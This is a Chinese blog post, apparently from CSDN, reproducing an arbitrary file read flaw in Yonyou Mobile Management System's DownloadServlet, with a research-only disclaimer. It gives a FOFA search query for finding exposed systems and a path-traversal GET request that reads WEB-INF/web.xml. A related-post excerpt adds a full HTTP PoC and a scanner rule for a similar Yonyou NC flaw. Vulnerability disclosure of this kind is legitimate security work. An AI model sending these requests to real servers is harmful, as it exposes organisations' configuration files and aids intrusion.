【漏洞复现】用友移动管理系统 DownloadServlet 任意文件读取漏洞

原创已于 2024-02-05 14:16:23 修改 · 564 阅读

10 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #web安全 #网络安全

于 2024-02-05 13:47:10 首次发布

漏洞复现专栏收录该内容

17 篇文章

订阅专栏

本文提醒读者，Aniya网络安全实验室的文章仅供研究学习，用户需自行承担传播或利用信息可能产生的后果。提到的FOFA语句和漏洞POC示例（GET请求针对用友-移动系统管理的web.xml）应谨慎对待。

声明：亲爱的读者，我们诚挚地提醒您，Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失，均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权，请立即告知，我们将立即删除并致歉。感谢您的理解与支持！

0x01FOFA语句

app="用友-移动系统管理"

页面大概长这个样子

0x02漏洞POC

GET /servlet/~maportal/;/com.yonyou.maportal.bs.padplugin.controller.DownloadServlet?filename=../../WEB-INF/web.xml

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Aniya也会哭

关注关注

9
点赞
踩
10

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

用友移动管理系统 多处文件上传漏洞复现

0xSec

01-10

1022

用友移动管理系统 /maportal/appmanager/uploadIcon.do、/mobsm/common/upload等接口存在任意文件上传漏洞，未经授权攻击者通过漏洞上传任意文件，最终可以获取服务器权限。

用友UFIDA-NC download 任意文件下载漏洞复现（含nuclei-poc）

m0_50797689的博客

03-21

600

用友UFIDA-NC download 任意文件下载漏洞复现（含nuclei-poc）

1 条评论您还未登录，请先登录后发表或查看评论

1 条评论

优快云-Ada助手 2024.02.06
恭喜您写了这么一篇有深度的技术博客，对于漏洞复现的细节分析非常到位，让读者能够清晰地了解到整个过程。希望您能继续保持对安全领域的热情和专注，或许可以考虑写一些实战经验分享类的文章，让更多人受益。期待您更多的精彩创作！

用友GRP-A++系统FileDownload接口存在拼接参数读取任意文件漏洞

weixin_43567873的博客

03-04

267

用友GRP-A++系统FileDownload接口存在拼接参数读取任意文件漏洞。

用友-移动系统管理 DownloadServlet 文件读取（含批量验证poc）

weixin_58134620的博客

04-12

472

用友移动管理系 download接口存在一个任意文件读取漏洞，攻击者可通过构造静心设计的请求，成功利用漏洞读取服务器上的任意文件，包括敏感系统文件和应用程序配置文件等。利用此漏洞，攻击者能获得系统内的敏感信息，导致潜在的信息泄露风险。

【漏洞复现】用友NC-download-文件读取

知黑而守白

01-23

322

用友NC是北京用友软件股份有限公司（简称“用友”）开发的一款企业管理软件，支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域，涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统，提供基于云计算、SaaS模式、本地部署等多种部署方式，广泛应用于国内外众多中小型企业和大型企业。用友NC download 接口存在任意文件读取漏洞。攻击者可以通过恶意构造的请求读取服务器上的任意文件，包括敏感的系统文件。此漏洞可能导致泄露敏感信息，为攻击者提供足够的信息来进一步渗透系统。

用友移动管理系统 DownloadServlet 任意文件读取漏洞复现

0xSec

01-27

574

用友移动管理系统 DownloadServlet 接口处任意文件读取漏洞，未经身份验证的攻击者可以利用此漏洞读取内部系统敏感文件，使系统处于极不安全的状态。

用友移动管理系统 DownloadServlet 任意文件读取漏洞复现（含nuclei-POC）

m0_50797689的博客

01-29

347

用友移动管理系统 DownloadServlet 任意文件读取漏洞复现（含nuclei-POC）

用友政务财务系统 FileDownload 任意文件读取漏洞复现

0xSec

04-24

991

用友政务财务系统 FileDownload 接口存在任意文件读取漏洞，未经身份攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

用友U8CRM系统help2 任意文件读取漏洞复现

fly夏天的博客

12-23

1003

用友U8+CRM系统的help2文件中接口存在任意文件读取漏洞，攻击者在未登录情况下即可进行漏洞利用。本文复现了这个漏洞并提供了进一步获取系统敏感文件的方法。

用友移动管理系统 任意文件上传漏洞复现

0xSec

08-12

2617

用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞，未经授权攻击者通过漏洞上传任意文件，最终可以获取服务器权限。

【漏洞复现】泛微e-Mobile 移动管理平台文件上传漏洞

qq_34780861的博客

04-25

4832

泛微e-Mobile移动管理平台是一款由泛微软件开发的企业移动办公解决方案。它提供了一系列的功能和工具，使企业员工能够通过移动设备随时随地地进行办公和协作。泛微e-Mobile 移动管理平台存在任意文件上传漏洞。

用友移动管理系统存在任意文件上传漏洞附POC

nnn2188185的博客

10-06

625

用友移动系统管理旧版本uploadApk接口存在任意文件上传，攻击者可在无需登录的情况下上传恶意文件，执行任意命令。

用友政务财务系统FileDownload接口存在任意文件读取漏洞

wan___she__pi的博客

04-27

741

用友政务财务系统是由用友软件开发的一款针对政府机构和公共事业单位设计的财务管理软件。该系统旨在提供全面的财务管理解决方案，以满足政府机构和公共事业单位在财务管理方面的需求。

【1day】用友移动管理系统任意文件读取漏洞学习

记录并分享学习安全的知识点..

10-07

463

用友移动管理系统是用友公司开发的一款移动办公解决方案，旨在帮助企业实现移动办公、移动审批、移动报销等业务流程的管理和处理。该系统提供了一系列移动应用和功能，方便员工随时随地处理工作事务，提高工作效率和响应速度。用友移动管理系统存在任意文件读取漏洞，攻击者可以在未经授权的情况下读取系统上的任意文件。

Hikvision SPON IP网络对讲广播系统存在命令执行漏洞CVE-2023-6895 附POC软件

nnn2188185的博客

12-27

1133

Hikvision SPON IP网络对讲广播系统存在命令执行漏洞CVE-2023-6895 附POC软件

Hikvision SPON IP网络对讲广播系统命令执行漏洞

故事讲予风听

02-26

785

Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞，该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。tips：这里的图有点问题，转码这个好像是他服务器的原因，我试过yakit和bp都是这样，而且我从来没改过这两软件的编码配置。python ./Hikvision SPON IP网络对讲广播系统命令执行.py -f ./url.txt。

SPON IP网络对讲广播系统的命令执行漏洞复现实验

weixin_57240513的博客

07-31

864

查询漏洞的语句icon_hash="-1830859634"

漏洞复现--用友移动管理平台uploadIcon任意文件上传

qq_53003652的博客

01-07

968

用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。该产品存在任意文件上传，攻击者可通过此漏洞获取服务器权限。访问/maupload/img/test.jsp。

❽⁄₂ ⟦ OSCP ⬖ 研记 ⟧ 修改漏洞利用脚本 ➱ 缓冲区溢出攻击原理

12-05

1007

本文详细解析了缓冲区溢出攻击的原理与实施流程。首先阐述了strcpy等不安全函数引发溢出的机制，指出攻击的核心目标是控制EIP/RIP寄存器。随后通过栈内存布局分析，说明了攻击者如何通过精确覆盖返回地址来劫持程序执行流程，并介绍了JMPESP等典型攻击技术。文章分步骤讲解了触发溢出、覆盖返回地址、注入Payload和选择返回指令等关键环节，强调了偏移量计算和环境适配的重要性。最后指出现代防御技术（如ASLR）通过增加地址随机性来对抗此类攻击，为安全防护提供了重要启示。

用友NC portal/file任意文件读取漏洞详情及解决方案

11-04

用友NC portal/file任意文件读取漏洞允许未经身份认证的攻击者通过该漏洞获取敏感信息，使系统处于极不安全状态。该漏洞的PoC如下： ```plaintext GET /portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: close ``` 其poc params如下： ```plaintext poc params: [] name: 用友NC portal/file 任意文件读取漏洞 set: {} rules: - method: GET path: /portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml headers: {} body: "" search: "" followredirects: false expression: response.status == 200 && response.body.bcontains(b"filter-mapping") groups: {} detail: author: "" links: [] description: "" version: "" ``` 关于解决方案，参考引用中未提及，一般来说可以采取以下通用措施：及时联系用友官方获取该漏洞的补丁并进行更新；对系统的访问进行严格的身份认证和授权管理，限制未授权的访问；对系统的文件读取功能进行审计和监控，及时发现和处理异常的文件读取行为 [^1][^3][^5]。